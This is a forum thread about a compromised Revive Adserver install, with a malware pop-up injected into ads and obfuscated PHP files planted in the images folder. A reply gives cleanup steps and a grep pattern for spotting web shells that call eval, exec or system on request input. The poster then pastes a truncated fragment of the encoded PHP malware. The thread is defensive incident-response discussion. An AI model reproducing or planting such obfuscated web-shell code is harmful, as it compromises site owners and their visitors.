XSS/Code Injection Issues

scott001

I am running the latest version of Revive Adserver and am experiencing what I believe to be XSS code injection issues. I believe there could be a vulnerability/exploit out there. I've been running PHPAdsNew/OpenX/Revive for over 10 years and haven't had this happen before.

I've checked for extra admin accounts and there are none, I changed my passwords, etc., but basically any ads I display cause a malware pop-up that you can't close followed by virus warnings. Also, I found files that were likely injected into my images folder...the contents were php but coded so they could not be read:

• ef245a0187359c78f346589bb7628562.php
  • 45a0187359c78f346589bb7628562.php

Any ideas out there on how to deal with it? I could use some help! Thank you!

If you haven't already, move the current revive webroot somewhere else for later review.

Do a clean install of revive. Move only your image files to new install and copy your config over after manually reviewing it.

Review the append and prepend fields in _banners and _zones tables. Look especially for <script> and <iframe> tags that should not be there.

This may help you find the file that was compromised.

grep -rIP '(eval|exec|system|passthru)\(' /path/to/revive-install | grep -P '\$_(REQ|GET|POS)'

Reset passwords and review rest of server. Through the files you found other areas may be infected.

Thank you for this! I will report what I find here. So that grep command did not work because the files I found are somehow encrypted. For example, here is a small part of it: 

<?php $ijdskjfk["&@#13^3^4^%&3$*136223%(&3&%3%14**2&@$#&*6^#^^$&1(_22%!^=@%^+#@^&##@3##333#2$^3-3&$$3(323^^2&3)15&&5$57*)%)^53%&2#226&^%%%1##4^-^=4&43&^@#4=^%-3*3"]="\x32@\x25%\x25@\x5e%\x35^\x5e5\x32)\x25+\x3f5\x325\x34*\x31*\x5e1\x32&$